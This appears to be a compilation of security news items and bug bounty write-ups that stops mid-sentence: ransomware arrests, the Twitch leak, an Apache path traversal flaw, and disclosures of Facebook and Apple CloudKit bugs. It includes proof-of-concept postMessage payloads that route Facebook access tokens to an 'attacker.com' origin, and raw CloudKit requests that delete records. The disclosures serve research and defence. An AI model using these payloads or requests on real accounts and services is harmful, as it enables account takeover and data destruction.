  3. Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents. The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from the Europol's European Cybercrime Centre and the INTERPOL's Cyber Fusion Centre. "The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met." Besides the two arrests, the international police operation witnessed a total of seven property raids, leading to the seizure of $375,000 in cash and two luxury vehicles costing €217,000 ($251,543), as well as the freezing of cryptocurrency assets worth $1.3 million. The suspects are believed to have demanded hefty sums ranging anywhere between €5 to €70 million as part of their extortion spree, and are connected to a gang that's staged ransomware attacks against more than 100 different companies, causing damages upwards of $150 million, according to the Ukrainian National Police. The identity of the syndicate has not been disclosed. One of the two arrestees, a 25-year-old Ukrainian national, allegedly deployed "virus software" by breaking into remote working programs, with the intrusions staged through social engineering campaigns that delivered spam messages containing malicious content to corporate email inboxes, the agency added. The development comes over three months after the Ukrainian authorities took steps to arrest members of the Clop ransomware gang and disrupt the infrastructure the group employed in attacks targeting victims worldwide dating all the way back to 2019. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/10/ransomware-hackers-who-attacked-over.html
  4. An unknown individual has leaked the source code and business data of video streaming platform Twitch via a torrent file posted on the 4chan discussion board earlier today. The leaker said they shared the data as a response to the recent “hate raids” —coordinated bot attacks posting hateful and abusive content in Twitch chats— that have plagued the platform’s top streamers over the summer. “Their community is […] a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories,” the leaker said earlier today. The Record has downloaded parts of the 125 GB torrent file shared by the leaker in order to confirm its authenticity. IMAGE: THE RECORD The content of the leak is in tune with what the leaker claimed to have shared earlier today, quoted below: Entirety of Twitch.tv, with commit history going back to its early beginnings Mobile, desktop and video game console Twitch clients Various proprietary SDKs and internal AWS services used by Twitch Every other property that Twitch owns including IGDB and CurseForge An unreleased Steam competitor from Amazon Game Studios Twitch SOC internal red teaming tools (lol) AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making! Among the treasure trove of data, the most sensitive folders are the ones holding information about Twitch’s user identity and authentication mechanisms, admin management tools, and data from Twitch’s internal security team, including white-boarded threat models describing various parts of Twitch’s backend infrastructure [see redacted image below]. IMAGE: THE RECORD IMAGE: THE RECORD While at the time of writing, The Record was unable to find personal details for any Twitch users, the leak also contained payout schemes for the platform’s top streamers, some of which had already confirmed its accuracy [1, 2, 3, 4]. The data, which we will not be linking or sharing in any way, is exposing the monthly revenues for some of the platform’s biggest earners, some of which reach six-figure sums; data that could be a boon for extortionists and criminal groups. A Twitch spokesperson did not immediately return a request for comment regarding today’s leak. The source of the leak is currently believed to be an internal Git server. Git servers are typically used by companies to allow large teams of programmers to make controlled and easily reversible changes to source code repositories. The leak was also labeled as “part one,” suggesting that more data will be leaked in the future. Although no user data was found in the leak, several security researchers have urged users to change their passwords and enable a multi-factor authentication solution for their account as a precaution. The leak comes a month after thousands of Twitch streams organized the #ADayOffTwitch walkout on September 1, refusing to stream in response to the ever-increasing hate raids. In August, Twitch promised to address the hate raids in a message posted on Twitter, asking for patience as the spam attacks did not have “a simple fix.” Article text has been updated with additional screenshots of the leak and confirmations from Twitch streamers. Title and text have updated to remove mention of Anonymous hacker collective as the source of the leak. Source: https://therecord.media/twitch-source-code-and-business-data-leaked-on-4chan/
  5. Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild. "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday. "If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts." The flaw, tracked as CVE-2021-41773, affects only Apache HTTP server version 2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021. Source: PT SWARM Also resolved by Apache is a null pointer dereference vulnerability observed during processing HTTP/2 requests (CVE-2021-41524), thus allowing an adversary to perform a denial-of-service (DoS) attack on the server. The non-profit corporation said the weakness was introduced in version 2.4.49. Apache users are highly recommended to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. https://securityaffairs.co/wordpress/122999/hacking/apache-zero-day-flaw.html
  6. Summery Facebook allowed online games owners to host their games/applications in apps.facebook.com for many years now. The idea and technology behind it was that the game ( Flash or HTML5 based) would be hosted in the owner website and later the website page hosting it should be shown to the Facebook user in apps.facebook.com inside a controlled iframe. Since the game is not hosted in Facebook and for best user experience like keeping score and profile data, Facebook had to establish a communication channel with the game owner to verify the identity of the Facebook user for example. This was ensured by using cross windows communication/messaging between apps.facebook.com and the game website inside the iframe. In this blog post, i’ll be discussing multiple vulnerabilities i found in this implementation. Vulnerabilities potential These bugs were found after careful auditing of the client-side code inside apps.facebook.com responsible of verifying what’s coming through this channel. The bugs explained below (and others) allowed me to takeover any Facebook account if the user decided to visit my game page inside apps.facebook.com. The severity of these bugs is high since these were present for years and billions of user and their information could have been compromised easily since this was served from inside Facebook. Facebook confirmed they didn’t see any indicators of previous abuse or exploitation of these bugs. For Researchers Before explaining the actual bugs below, i tried to show the way i decomposed the code and a simplified path to track the flow of the message data and how its components will be used. I probably didn’t left much to dig but i hope the information shared could help you in your research. If you are only interested in the bugs themselves then jump to each bug section part. Description So far we know that the game page being served inside an iframe in apps.facebook.com is communicating with the parent window to ask Facebook to do some actions. Among the requested actions , for example , is to show a dialog to the user that would allow him to confirm the usage of the Facebook application owned by the game developers which would help me to identify you and get some information from an access token that they’ll receive if the user decided to user the application. The script responsible of receiving the cross window messages, interpreting them and understanding the action demanded is below ( only necessary parts are shown and as they were before the bugs were fixed ) : __d("XdArbiter", ... handleMessage: function(a, b, e) { d("Log").debug("XdArbiter at " + (window.name != null && window.name !== "" ? window.name : window == top ? "top" : "[no name]") + " handleMessage " + JSON.stringify(a)); if (typeof a === "string" && /^FB_RPC:/.test(a)) { k.enqueue([a.substring(7), { origin: b, source: e || i[h] }]); ... send: function(a, b, e) { var f = e in i ? e : h; a = typeof a === "string" ? a : c("QueryString").encode(a); b = b; try { d("SecurePostMessage").sendMessageToSpecificOrigin(b, a, e) } catch (a) { d("Log").error("XdArbiter: Proxy for %s not available, page might have been navigated: %s", f, a.message), delete i[f] } return !0 } ... window.addEventListener("message", function(a) { if (a.data.xdArbiterSyn) d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, { xdArbiterAck: !0 }); else if (a.data.xdArbiterRegister) { var b = l.register(a.source, a.data.xdProxyName, a.data.origin, a.origin); d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, { xdArbiterRegisterAck: b }) } else a.data.xdArbiterHandleMessage && l.handleMessage(a.data.message, a.data.origin, a.source) }), 98); __d("JSONRPC", ... c.read = function(a, c) { ... e = this.local[a.method]; try { e = e.apply(c || null, a.params); typeof e !== "undefined" && g("result", e) ... e.exports = a }), null); __d("PlatformAppController", ... function f(a, b, e) { ... c("PlatformDialogClient").async(f, a, function(d) { ... b(d) }); }... t.local.showDialog = f; ... t = new(c("JSONRPC"))(function(a, b) { var d = b.origin || k; b = b.source; if (b == null) { var e = c("ge")(j); b = e.contentWindow } c("XdArbiter").send("FB_RPC:" + a, b, d) } ... }), null); __d("PlatformDialogClient", ... function async(a, b, e) { var f = c("guid")(), g = b.state; b.state = f; b.redirect_uri = new(c("URI"))("/dialog/return/arbiter").setSubdomain("www").setFragment(c("QueryString").encode({ origin: b.redirect_uri })).getQualifiedURI().toString(); b.display = "async"; j[f] = { callback: e || function() {}, state: g }; e = "POST"; d("AsyncDialog").send(new(c("AsyncRequest"))(this.getURI(a, b)).setMethod(e).setReadOnly(!0).setAbortHandler(k(f)).setErrorHandler(l(f))) } ... function getURI(a, b) { if (b.version) { var d = new(c("URI"))("/" + b.version + "/dialog/" + a); delete b.version; return d.addQueryData(b) } return c("PlatformVersioning").versionAwareURI(new(c("URI"))("/dialog/" + a).addQueryData(b)) } }), 98); To simplify the code for you to understand the flow in case someone decides to dig more into it and looks for more bugs : Iframe sends message to parent => Message event dispatched in XdArbiter => Message handler function passes data to handleMessage function => “enqueue” function passes to JSONRPC => JSONRPC.read calls this.local.showDialog function in PlatformAppController => function checks message and if all valid, call PlatformDialogClient => PlatformDialogClient.async sends a POST request to apps.facebook.com/dialog/oauth , returned access_token would be passed to XdArbiter.send function ( few steps were skipped ) => XdArbiter.send would send a cross window message to the iframe window => Event dispatched in iframe window containing Facebook user access_token Below an example of a simple code to construct the message to be sent to apps.facebook.com from the iframe, a similar one would be send from any game page using the Facebook Javascript SDK but with more unnecessary parts: msg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://ysamm.com/callback","app_id":"APP_ID","client_id":"APP_ID","response_type":"token"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + msg , origin: IFRAME_ORIGIN} window.parent.postMessage(fullmsg,"*"); Interested parts to manipulate are : – IFRAME_ORIGIN, which is the one to be used in the redirect_uri parameter send with the POST request to apps.facebook.com/dialog/oauth to be verified server-side that it’s a domain owned by the application requesting an access_token, then would be used as targetOrigin in postMessage to send a cross window message to the iframe with the access_token – Keys and values of the object inside params , there are the parameters to be appended to apps.facebook.com/dialog/oauth. Most interesting ones are redirect_uri ( which can replace IFRAME_ORIGIN in the POST request in some cases ) and APP_ID Attacks vectors/scenarios What we’ll do here is to try to instead of requesting an access token for the game application we own, we’ll try to get one of a Facebook first party application like Instagram. What’s holding us back is although we control the IFRAME_ORIGIN and APP_ID which we can set to match the Instagram application as www.instagram.com and 124024574287414, later the message sent to the iframe containing the first party access token would have a targetOrigin in postMessage as www.instagram.com which is not our window origin. Facebook did a good job protecting against these attacks ( i’ll argue though to why not using the origin from the event message received and matching app_id to the hosted game instead of giving us total freedom which could have prevented all these bugs ), but apparently they left some weaknesses that could have been exploited for many years. Bug 1: Parameter Pollution, it was checked server-side and we definitely should trust it This bug occurs due to the fact that the POST request to https://apps.facebook.com/dialog/oauth when constructed from the received message from the iframe, could contain user controlled parameters. All parameters are checked in the client-side ( PlatformAppController, showDialog method and ,PlatformDialogClient.async method) and duplicate parameters will be removed in PlatformAppController , also AsyncRequest module seems to be doing some filtering ( removing parameters that already exist but brackets were appended to it ). However due to some missing checking in the server-side, a parameter name set to PARAM[random would replace a previously set parameter PARAM ; for example redirect_uri[0 parameter value would replace redirect_uri. We can abuse this as follow : 1) Set APP_ID to be the Instagram application id. 2) The redirect_uri will be constructed in PlatformDialogClient.async (Line 72 ) using IFRAME_ORIGIN ( will end up https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com ) , which would be sent matching our iframe window origin but won’t be used at all as explained below. 3) Set redirect_uri[0 in params as an additional parameter ( order matters so it must be after redirect_uri ) to be https://www.instagram.com/accounts/signup/ which is a valid redirect_uri for the Instagram applicaiton. The URL of the POST request end up being something like this: https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com&app_id=124024574287414&client_id=124024574287414&response_type=token&redirect_uri[0=https://www.instagram.com/accounts/signup/ The request would end up being successful and returning a first party access token since redirect_uri[0 replaces redirect_uri and it’s a valid redirect_uri. In the client side though, the logic is if an access_token was received it means that the origin used to construct the redirect_uri did work with the app_id and for that it should trust it and use to send the message to the iframe, behind the scenes though redirect_uri[0 was used and not redirect_uri ( Cool right?) Proof of concept: xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://attacker.com/callback","app_id":"124024574287414","client_id":"124024574287414","response_type":"token","redirect_uri[0":"https://www.instagram.com/accounts/signup/"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"} window.parent.postMessage(fullmsg,"*"); Bug 2: Why bothering, Origin is undefined The main problem for this one is that /dialog/oauth endpoint would accept https://www.facebook.com/dialog/return/arbiter as a valid redirect_uri ( without a valid origin in the fragment part ) for third-party applications and some first-party ones. The second problem is that this behaviour to occur ( no origin in the fragment part ), the message sent from the iframe to apps.facebook.com should not contain a.data.origin ( IFRAME_ORIGIN is undefined ) , however this same value would be used later to send a cross window message to the iframe, if null or undefined is used, the message won’t be received. Likely, i noticed that JSONRPC function would always receive a not null origin of the postMessage ( Line 55 ) . Since b.origin is undefined or null, k would be chosen. k could be set by the attacker by first registering a valid origin via c(“Arbiter”).subscribe(“XdArbiter/register”) which could be informed if our message had xdArbiterRegister and a specified origin . Before “k” variable is set, the supplied origin would be checked first if it belongs to the attacker application using “/platform/app_owned_url_check/” endpoint. This is wrong and the second problem occurs here since we can’t ensure that the user in the next cross origin message sent from the iframe would supply the same APP_ID. Not all first-party applications are vulnerable to this though. I used the Facebook Watch for Android application or Portal to get a first party access_token. The URL of the POST request would be something like this: https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter&app_id=1348564698517390&client_id=1348564698517390&response_type=token Proof Of Concept window.parent.postMessage({xdArbiterRegister:true,origin:"https://attacker.com"},"*") xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","app_id":"1348564698517390","client_id":"1348564698517390","response_type":"token"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg} window.parent.postMessage(fullmsg,"*"); Bug 3: Total Chaos, version can’t be harmful This bug one occurs in PlatformDialogClient.getURI function which is responsible of setting the API version before /dialog/oauth endpoint. This function didn’t check for double dots or added paths and directly constructed a URI object to be used later to send an XHR request ( Line 86 ). The version property in params passed in the cross window message sent to apps.facebook.com could be set to api/graphql/?doc_id=DOC_ID&variables=VAR# and would eventually lead to a POST request sent to the GraphQL endpoint with valid user CSRF token. DOC_ID and VAR could be set to an id of a GraphQL Mutation to add a phone number to the attacount, and the variables of this mutation. The URL of the POST request would be something like this: https://apps.facebook.com/api/graphql?doc_id=DOC_ID&variables=VAR&?/dialog/oauth&state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=attacker&app_id=1348564698517390&client_id=1348564698517390&response_type=token Proof Of Concept xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","client_id":"APP_ID","response_type":"token","version":"api/graphql?doc_id=DOC_ID&variables=VAR&"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"} window.parent.postMessage(fullmsg,"*"); Timeline Aug 4, 2021— Report Sent  Aug 4, 2021—  Acknowledged by Facebook Aug 6, 2021— Fixed by Facebook Sep 2, 2021 — $42000 bounty awarded by Facebook. Aug 9, 2021— Report Sent  Aug 9, 2021—  Acknowledged by Facebook Aug 12, 2021— Fixed by Facebook Aug 31, 2021 — $42000 bounty awarded by Facebook. Aug 12, 2021— Report Sent  Aug 13, 2021—  Acknowledged by Facebook Aug 17, 2021— Fixed by Facebook Sep 2, 2021 — $42000 bounty awarded by Facebook. Source: https://ysamm.com/?p=708
  7. TL;DR. CloudKit, the data storage framework by Apple, has various access controls. These access controls could be misconfigured, even by Apple themselves, which affected Apple’s own apps using CloudKit. This blog post explains in detail three bugs found in iCrowd+, Apple News and Apple Shortcuts with different criticality uncovered by Frans Rosen while hacking Cloudkit. All bugs were reported to and fixed by the Apple Security Bounty program. Intro Ever since the fantastic “We Hacked Apple for 3 Month” article by Ziot, Sam, Ben, Samuel and Tanner, I wanted to approach Apple myself, looking for bugs with my own mindset. The article they wrote is still one of the best inspirational posts I’ve ever read and it’s still a post I regularly go back to for more info. In the middle of February this year I had the ability to spend some time and I decided to go all in on hunting bugs on Apple. If you’ve been in and out of bug hunting you might recognize the same kind of feeling I had. I felt that I sucked, that I could not find anything interesting. Ben and the team had already found all the bugs, right? It took me three days, three days of fighting the imposter syndrome, feeling worthless and almost stressed by not getting anywhere. I was intercepting requests all over the place, modifying things cluelessly and expecting miracles. Miracles don’t work that way. On the third day, I started to connect the dots, realized how certain assets connected to other assets, and started to understand more how things worked. This is when some of the first bugs popped up, finally restoring my self-esteem a bit, making me more relaxed and focused going forward. I dug up an old jailbroken iPad I had, which allowed me to proxy all content through my laptop. I downloaded all Apple owned apps and started looking at the traffic. What is CloudKit? Quite early on I noticed that a lot of Apple’s own apps used a technology called CloudKit and you could say it is Apple’s equivalent to Google’s Firebase. It has a database storage that is possible to authenticate to and directly fetch and save records from the client itself. I started reading the CloudKit documentation and used the CloudKit Catalog tool and created my own container to play around with it. Before getting into the hacking of Cloudkit, here’s a short description of the structure of CloudKit, this is the 30 second explanation: You create a container with a name. Suggested format is reversed domain structure, like com.apple.xxx. All containers you create yourself will begin with iCloud. Inside the container you have two environments, Development and Production. Inside the environments you have three different scopes, Private, Shared and Public. Private is only accessible by your own user. Shared is used for data being shared between users and Public is accessible by anyone, some parts with a public API-token, and some with authentication (with some exceptions, I’ll get to that below). Inside each scope, you have different zones you can create. Default zone is called _defaultZone. Inside each zone, you have different record types that you can create yourself. Each record type can contain different record fields, these fields can save different types of data, like INT, BOOLEAN, TEXT, BINARY etc. Inside each zone you also have records. Each record is always connected to a record type. There are even more features to it of course, for example the ability to create indexes and security roles with permissions. For Private and Shared scopes, you always need to authenticate as yourself. For the Public scope, you can have the ability to both read and write to the scope without personal authentication. You can enable public tokens that give you access to the public scope, but with the combination of authenticating as your own user gives access to the Private and Shared scopes. It was quite complex to understand all different authentication flows, and security roles, and this made me curious. Could it be that this was not only complex for me to understand, but also for teams using it internally at Apple? I started investigating where it was being used and for what. Reconnaissance To be able to understand where the CloudKit service was used by Apple themselves, I started to see in what ways all different apps connected to it. By just proxying everything from the iPad, the browser and using all apps, I could gather a bunch of requests and responses. After looking it through I noticed that Apple used different ways to connect to CloudKit. The iCloud assets, like Notes and Photos on www.icloud.com used one API: POST /database/1/com.apple.notes/production/public/records/resolve?... Host: p55-ckdatabasews.icloud.com and the developer portal at icloud.developer.apple.com had a different API: POST /r/v4/user/iCloud.com.mycontainer.test/Production/public/records/query?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com A lot of iOS-apps used a third API at gateway.icloud.com. This API used headers to specify what container was being used. These requests were almost always using protobuf: POST /ckdatabase/api/client/record/save HTTP/1.1 Host: gateway.icloud.com:443 X-CloudKit-ContainerId: com.apple.siri.data Accept: application/x-protobuf Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true if you used the CloudKit Catalog to test CloudKit API, it would instead use api.apple-cloudkit.com: POST /database/1/iCloud.com.example.CloudKitCatalog/production/public/records/query?... Host: api.apple-cloudkit.com For CloudKit Catalog you needed an API-token for getting access to the public scope. When I tried connecting to the CloudKit containers I saw while intercepting the iOS-apps, I failed due to the lack of the API-token needed to complete the authentication flow. iCrowd+ When testing all the apps and subdomains of Apple, one website, made by Apple, was actually utilizing the api.apple-cloudkit.com with an API-token provided. Going to https://public.icrowd.apple.com/ I could see the containers being used in the Javascript-file: containers: [{ containerIdentifier:"iCloud.com.apple.phonemo", apiTokenAuth: { apiToken:"f260733f..." }, environment:"production" }, { containerIdentifier:"iCloud.com.apple.icrowd", apiTokenAuth: { apiToken:"b90c3b24..." }, environment:"production" }] It then made a request to fetch the current version of the iCrowd+ application, to show the version on the start page: I could also see in the requests made by the websites that it was querying the records of the database, and that the record type was called Updates: "records" : [ { "recordName" :"FD935FB2-A401-6F05-E9D8-631BBC2A68A1", "recordType" :"Updates", "fields" : { "name" : { "value" :"iCrowd", "type" :"STRING" }, "description" : { "value" :"Updated to support iOS 14 and Personalized Hey Siri project.", "type" :"STRING" }, "version" : { "value" :"2.16.3", "type" :"STRING" }, "required" : { "value" :1, "type" :"INT64" } }, Since I had the token, I could use the CloudKit Catalog to connect to the Container: https://cdn.apple-cloudkit.com/cloudkit-catalog/?container=iCloud.com.apple.phonemo&environment=production&apiToken=f260733f...#authentication Looking at the records of the Public scope, I could see the data the website was fetching to use the version-data for the button: I then tried to add my own record to the same zone: Which gave me a response: When I now accessed the same website again at: https://public.icrowd.apple.com/, this is what I saw: I then realized that I could modify the data of the website, made a report to Apple on the 17th of February and deleted my record quickly again. Here’s a video showing the proof of concept I sent: I now realized that there might be other bugs related to permissions and that the public scope was the most interesting one, since it was shared among all users. I continued the process of finding where CloudKit databases were being utilized. Apple’s response Apple responded and fixed the issue on the 25th of February by completely removing the usage of CloudKit from the website at https://public.icrowd.apple.com/. Apple News Apple News was not really accessible from Sweden, so I created a new Apple ID based in the United States to be able to use it. As soon as I got in, I noticed that all news was served using CloudKit, and all articles were served from the public scope. That made sense, since news content was the same for all users. I could also see that the Stock app on iOS also fetched from the same container: GET /ckdatabase/stocks/topstories/WHT4Rx3... HTTP/1.1 Host: gateway.icloud.com:443 X-CloudKit-ContainerId: com.apple.news.public X-CloudKit-DatabaseScope: Public X-CloudKit-BundleId: com.apple.stocks User-Agent: AppleNews/679 Version/3.1 X-MMe-Client-Info: <iPad5,4> <iPhone OS;14.2;18B92> <com.apple.newscore/6.1 (com.apple.stocks/3.1)> Using the CloudKit API through gateway.icloud.com was tricky though. All communication was made through protobuf. There is an awesome project called InflatableDonkey that tries to reverse engineer the iCloud backup process from iOS 9. Since that project was only focusing on fetching data, a lot of methods in the Protobuf was not fully reversed, so I had to bruteforce a bit to try to find the methods needed also for modifications, and since Protobuf is binary, I didn’t really need the proper names, since each property in the protobuf is enumerable due to how the format is designed: I spent way too much time on this, almost two days straight, but as soon as I found methods I could use, modification of records in the Public scope still needed authorization for my user, and I was never able to figure out how to generate a X-CloudKit-AuthToken for the proper scope, since I was mainly interested in the Private scope. But remember that I mentioned different APIs talked with CloudKit differently? I logged in to www.icloud.com and went to the Notes-app, which talked with CloudKit using p55-ckdatabasews.icloud.com: POST /database/1/com.apple.notes/production/private/records/query?clientBuildNumber=2104Project55&clientMasteringNumber=2104B31 HTTP/1.1 Host: p55-ckdatabasews.icloud.com I then changed the container from com.apple.notes to com.apple.news.public with the public scope instead. I also extracted one of the articles I could see using the app in the protobuf communication to gateway.icloud.com: POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38& clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: X-APPLE-WEB-ID=... { "records": { "recordName":"A-OQYAcObS_W_21xWarFxFQ" }, "zoneID": { "zoneName":"_defaultZone" } } And the response was: { "records" : [ { "recordName" :"A-OQYAcObS_W_21xWarFxFQ", "recordType" :"Article", "fields" : { "iAdKeywords" : { "value" : ["TGiSf6ByLEeqXjy5yjOiBJQ","TGiSr-hyLEeqXjy5yjOiBJQ","TdNFQ6jKmRsSURg96xf4Xiw" ], "type" :"STRING_LIST" }, "topicFlags_143455" : { "value" : [12,0 ], "type" :"INT64_LIST" ... I also verified that stock-data was present: { "records": { "recordName":"S-AAPL" }, "zoneID": { "zoneName":"_defaultZone" } } this gave me: { "records" : [ { "recordName" :"S-AAPL", "recordType" :"Stock", "fields" : { "stockEntityID" : { "value" :"EKaaFEbKHS32-pJMZGHyfNw", "type" :"STRING" }, "symbol" : { "value" :"AAPL", "type" :"STRING" }, "feedConfiguration_143441" : { "value" :"{\"feedID\":\"EKaaFEbKHS32-pJMZGHyfNw$en-US\"}", "type" :"STRING" }, Success! I now knew that I could talk with the com.apple.news.public-container using the authenticated API on p55-ckdatabasews.icloud.com. I had a different Apple ID set up as a News Publisher, so I could create article drafts and create a published channel to the Apple News app. I created a channel and an article and started testing calls to them. Since the Apple ID I used for making requests to the API, I knew that if I could make modifications to the content, I could modify any article or stock data. The Channel-ID I had was TtVkjIR3aTPKrWAykey3ANA. Making a lookup query: POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: X-APPLE-WEB-ID=... showed me my test channel: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "recordType" :"Tag", "fields" : { "relatedTopicTagIDsForOnboarding_143455" : { "value" : [ ], "type" :"STRING_LIST" }, "defaultSectionTagID" : { "value" :"T18PTnZkqQ0qgW33zGzxs8w", "type" :"STRING" }, ... "name" : { "value" :"moa oma", "type" :"STRING" }, With my iPad, I also verified by going to https://apple.news/TtVkjIR3aTPKrWAykey3ANA I could see my channel in the Apple News app. I then tried all the methods that was possible against records using records/modify, based on the CloudKit documentation: create, update, forceUpdate, replace, forceReplace, delete and forceDelete. On all methods, the response looked like this: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"Operation not permitted", "serverErrorCode" :"ACCESS_DENIED" } ] } But, on forceDelete: POST /database/1/com.apple.news.public/production/public/records/modify?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: ... { "numbersAsStrings":true, "operations": [ { "record": { "recordType":"Article", "recordChangeTag": "ok", "recordName":"TtVkjIR3aTPKrWAykey3ANA" }, "operationType":"forceDelete" } ], "zoneID": { "zoneName":"_defaultZone" } } The response said: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "deleted" :true } ] } I reloaded the channel in Apple News: This confirmed to me that I could delete any channel or article, including stock entries, in the container com.apple.news.public being used for the Stock and Apple News iOS-apps. This worked due to the fact that I could make authenticated calls to CloudKit from the API being used for the Notes-app on www.icloud.com and due to a misconfiguration of the records added in the com.apple.news.public-container. I made a proof of concept to Apple and sent it as a different report on the 17th of March. Apple’s response Apple replied with a fix in place on the 19th of March by modifying the permissions of the records added to com.apple.news.public, where even the forceDelete-call would respond with: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"delete operation not allowed", "serverErrorCode" :"ACCESS_DENIED" } ] } I also notified Apple about more of their own containers still having the ability to delete content from, however, it wasn’t clear if those containers were actually using the Public scope at all. Shortcuts Another app that was using the Public scope of CloudKit was Shortcuts. With Apple Shortcuts you can create logical flows that can be launched automatically or manually which then triggers different actions across your apps on iOS-devices. These shortcuts can be shared with other people using iCloud-links which creates an ecosystem around them. There are websites dedicated to recommending and sharing these Shortcuts through iCloud-links. As mentioned above, there is a Shared scope in a CloudKit container. When you decide to share anything private, this scope is often used. You would get something called a Short GUID, that looks something like 0H1FzBMaF1yAC7qe8B2OIOCxx and it would be possible to access using https://www.icloud.com/share/[shortGUID]. However, Apple Shortcuts links works a bit differently. When you share a shortcut, a record with the record type SharedShortcut will be created in the Public scope. The Record name being used will then be formed as a GUID: EA15DF64-62FD-4733-A115-452A6D1D6AAF, the record name will then be formatted to a lowercase string without hyphens and end up as: https://www.icloud.com/shortcuts/ea15df6462fd4733a115452a6d1d6aaf which will be the URL you would share publicly. Accessing this URL would then make a call to: https://www.icloud.com/shortcuts/api/records/ea15df6462fd4733a115452a6d1d6aaf which would return the data from CloudKit: { "recordType":"SharedShortcut", "created": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "recordChangeTag":"jnm8rnmw", "pluginFields": {}, "deleted":false, "recordName":"EA15DF64-62FD-4733-A115-452A6D1D6AAF", "modified": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "fields": { "icon_glyph": { "type":"NUMBER_INT64", "value":59412 }, "icon": { "type":"ASSETID", "value": { "downloadURL":"..." This made me excited since I could already see a few attack scenarios. If I could modify other users’ shortcuts, that would be really bad. Also the same kind of issue as on Apple News, being able to delete someone else’s shortcut, would also not be great. The Public scope also contained the Shortcuts Gallery that was showing up in the app itself: So if that content could be modified that would be quite critical. The Shortcuts app itself used the protobuf API at gateway.icloud.com: POST /ckdatabase/api/client/record/save HTTP/1.1 Host: gateway.icloud.com X-CloudKit-ContainerId: com.apple.shortcuts X-CloudKit-BundleId: com.apple.shortcuts X-CloudKit-DatabaseScope: Public Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true User-Agent: CloudKit/962 (18B92) X-CloudKit-AuthToken: [MY-TOKEN] Since I had spent so much time modifying InflatableDonkey to try all methods, I could now also use the X-CloudKit-AuthToken from my interception to try to make authorized calls to modify records to the Public scope. However, all the methods that actually did modifications gave me permission errors: "CREATE operation not permitted* ck1w5bmtg" This made me realize that through the API at gateway.icloud.com, my X-CloudKit-AuthToken did not allow me to modify any records in the Public scope. I spent almost 5-6 hours trying to identify if there were any methods I did not get permission errors on but without any luck. Since I had already reported the bugs with Apple News, and Apple had already fixed those issues, when I tried the same API connection method I initially took from Notes on www.icloud.com: POST /database/1/com.apple.shortcuts/production/public/records HTTP/1.1 Host: p55-ckdatabasews.icloud.com that also failed, the container com.apple.shortcuts was not accessible with the authentication being used from www.icloud.com. But remember that I mentioned different APIs talked with CloudKit differently? I went to icloud.developer.apple.com and connected to my own container, took one of the requests and 